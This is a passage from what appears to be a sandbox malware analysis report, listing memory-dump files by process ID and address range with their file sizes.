                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                                                        • memory/2216-292-0x0000000004FF0000-0x0000000005103000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                                                        • memory/2216-294-0x0000000004FF0000-0x0000000005103000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                                                        • memory/2216-332-0x0000000004FF0000-0x0000000005103000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                                                        • memory/2216-334-0x0000000004FF0000-0x0000000005103000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                                                        • memory/2216-336-0x0000000004FF0000-0x0000000005103000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                                                        • memory/2216-338-0x0000000004FF0000-0x0000000005103000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                                                        • memory/2216-340-0x0000000004FF0000-0x0000000005103000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                                                        • memory/2216-344-0x0000000004FF0000-0x0000000005103000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                                                        • memory/2348-6859-0x0000000000940000-0x0000000000B90000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          2.3MB

                                                                                                                                                                                                                                                                        • memory/2396-2956-0x00007FF765AD0000-0x00007FF765F60000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4.6MB

                                                                                                                                                                                                                                                                        • memory/2396-2967-0x00007FF765AD0000-0x00007FF765F60000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4.6MB

                                                                                                                                                                                                                                                                        • memory/2480-2-0x00007FFAABF90000-0x00007FFAACA51000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          10.8MB

                                                                                                                                                                                                                                                                        • memory/2480-76-0x00007FFAABF93000-0x00007FFAABF95000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                        • memory/2480-0-0x00007FFAABF93000-0x00007FFAABF95000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                        • memory/2480-1-0x00000000009D0000-0x00000000009D8000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                                                                        • memory/2480-107-0x00007FFAABF90000-0x00007FFAACA51000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          10.8MB

                                                                                                                                                                                                                                                                        • memory/2792-4268-0x000001EC2C2F0000-0x000001EC2C97E000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          6.6MB

                                                                                                                                                                                                                                                                        • memory/3044-1602-0x0000000005330000-0x0000000005352000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          136KB

                                                                                                                                                                                                                                                                        • memory/3044-188-0x0000000005380000-0x000000000541C000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          624KB

                                                                                                                                                                                                                                                                        • memory/3044-187-0x00000000006D0000-0x0000000000940000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          2.4MB

                                                                                                                                                                                                                                                                        • memory/3044-1601-0x0000000005DE0000-0x0000000006384000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          5.6MB

                                                                                                                                                                                                                                                                        • memory/3044-1600-0x00000000056C0000-0x0000000005820000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.4MB

                                                                                                                                                                                                                                                                        • memory/3672-6682-0x00007FF765AD0000-0x00007FF765F60000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4.6MB

                                                                                                                                                                                                                                                                        • memory/4388-6550-0x00000000000C0000-0x00000000000D6000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          88KB

                                                                                                                                                                                                                                                                        • memory/4496-5808-0x0000000000CB0000-0x0000000000DCA000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                                                        • memory/4560-35-0x000001915D570000-0x000001915D732000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.8MB

                                                                                                                                                                                                                                                                        • memory/4560-36-0x00007FFAABF90000-0x00007FFAACA51000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          10.8MB

                                                                                                                                                                                                                                                                        • memory/4560-34-0x0000019142F20000-0x0000019142F38000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          96KB

                                                                                                                                                                                                                                                                        • memory/4560-37-0x000001915DD70000-0x000001915E298000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          5.2MB

                                                                                                                                                                                                                                                                        • memory/4560-175-0x00007FFAABF90000-0x00007FFAACA51000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          10.8MB

                                                                                                                                                                                                                                                                        • memory/4656-264-0x0000000000400000-0x0000000000A9C000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          6.6MB

                                                                                                                                                                                                                                                                        • memory/4656-1512-0x0000000000400000-0x0000000000A9C000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          6.6MB

                                                                                                                                                                                                                                                                        • memory/4656-1506-0x0000000000400000-0x0000000000A9C000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          6.6MB

                                                                                                                                                                                                                                                                        • memory/4668-1698-0x000002E1EA140000-0x000002E1EA5D0000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4.6MB

                                                                                                                                                                                                                                                                        • memory/4724-5723-0x000002461DF20000-0x000002461DF72000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          328KB

                                                                                                                                                                                                                                                                        • memory/4820-236-0x0000000000400000-0x00000000007BD000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          3.7MB

                                                                                                                                                                                                                                                                        • memory/5200-4258-0x0000000004F50000-0x0000000004FA8000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          352KB

                                                                                                                                                                                                                                                                        • memory/5200-3077-0x0000000000360000-0x000000000047A000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                                                        • memory/5200-3078-0x0000000004D40000-0x0000000004E26000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          920KB

                                                                                                                                                                                                                                                                        • memory/5200-3079-0x0000000004E30000-0x0000000004F16000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          920KB

                                                                                                                                                                                                                                                                        • memory/5292-6695-0x0000000000760000-0x0000000000774000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          80KB

                                                                                                                                                                                                                                                                        • memory/5372-1488-0x0000000000990000-0x000000000110B000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          7.5MB

                                                                                                                                                                                                                                                                        • memory/5372-1527-0x0000000000990000-0x000000000110B000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          7.5MB

                                                                                                                                                                                                                                                                        • memory/5624-5698-0x0000000000400000-0x000000000197D000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          21.5MB

                                                                                                                                                                                                                                                                        • memory/5624-5471-0x0000000000400000-0x000000000197D000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          21.5MB

                                                                                                                                                                                                                                                                        • memory/5892-5695-0x0000000000DD0000-0x0000000000EDC000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.0MB

                                                                                                                                                                                                                                                                        • memory/5980-7091-0x0000000000860000-0x0000000000878000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          96KB

                                                                                                                                                                                                                                                                        • memory/6008-3052-0x0000027145720000-0x0000027145764000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          272KB

                                                                                                                                                                                                                                                                        • memory/6008-3053-0x00000271459F0000-0x0000027145A66000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          472KB

                                                                                                                                                                                                                                                                        • memory/6020-7037-0x0000000000ED0000-0x0000000001120000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          2.3MB

                                                                                                                                                                                                                                                                        • memory/6072-4603-0x0000000009AC0000-0x0000000009ADE000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                                                                        • memory/6072-1507-0x0000000000C10000-0x0000000001086000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4.5MB

                                                                                                                                                                                                                                                                        • memory/6072-5435-0x000000000A320000-0x000000000A33A000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          104KB

                                                                                                                                                                                                                                                                        • memory/6072-5434-0x000000000A2D0000-0x000000000A2E4000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          80KB

                                                                                                                                                                                                                                                                        • memory/6072-5433-0x000000000E370000-0x000000000E37E000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          56KB

                                                                                                                                                                                                                                                                        • memory/6072-5367-0x000000000E330000-0x000000000E341000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          68KB

                                                                                                                                                                                                                                                                        • memory/6072-5318-0x000000000E320000-0x000000000E32A000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                                                                        • memory/6072-5309-0x000000000E090000-0x000000000E133000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          652KB

                                                                                                                                                                                                                                                                        • memory/6072-5308-0x000000000E070000-0x000000000E08E000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                                                                        • memory/6072-5174-0x000000000C700000-0x000000000C74C000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                                                                        • memory/6072-5117-0x000000000C5D0000-0x000000000C636000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          408KB

                                                                                                                                                                                                                                                                        • memory/6072-5099-0x000000000C200000-0x000000000C554000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          3.3MB

                                                                                                                                                                                                                                                                        • memory/6072-5436-0x000000000A340000-0x000000000A348000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                                                                        • memory/6072-1577-0x0000000000C10000-0x0000000001086000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4.5MB

                                                                                                                                                                                                                                                                        • memory/6072-4516-0x000000000B890000-0x000000000B8AA000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          104KB

                                                                                                                                                                                                                                                                        • memory/6072-4590-0x000000000B930000-0x000000000B9C6000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          600KB

                                                                                                                                                                                                                                                                        • memory/6072-4578-0x000000000C780000-0x000000000CDFA000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          6.5MB

                                                                                                                                                                                                                                                                        • memory/6072-4517-0x000000000B8F0000-0x000000000B926000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          216KB

                                                                                                                                                                                                                                                                        • memory/6072-4602-0x0000000009A70000-0x0000000009A92000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          136KB

                                                                                                                                                                                                                                                                        • memory/6072-4395-0x000000000BAD0000-0x000000000C0F8000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          6.2MB

                                                                                                                                                                                                                                                                        • memory/6072-4382-0x000000000B490000-0x000000000B49E000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          56KB

                                                                                                                                                                                                                                                                        • memory/6072-2905-0x0000000007800000-0x000000000780A000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                                                                        • memory/6072-4604-0x000000000B9D0000-0x000000000BA1A000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          296KB

                                                                                                                                                                                                                                                                        • memory/6072-1509-0x0000000000C10000-0x0000000001086000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4.5MB

                                                                                                                                                                                                                                                                        • memory/6072-1508-0x0000000000C10000-0x0000000001086000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4.5MB

                                                                                                                                                                                                                                                                        • memory/6240-7039-0x00000000003C0000-0x0000000000610000-memory.dmp

                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          2.3MB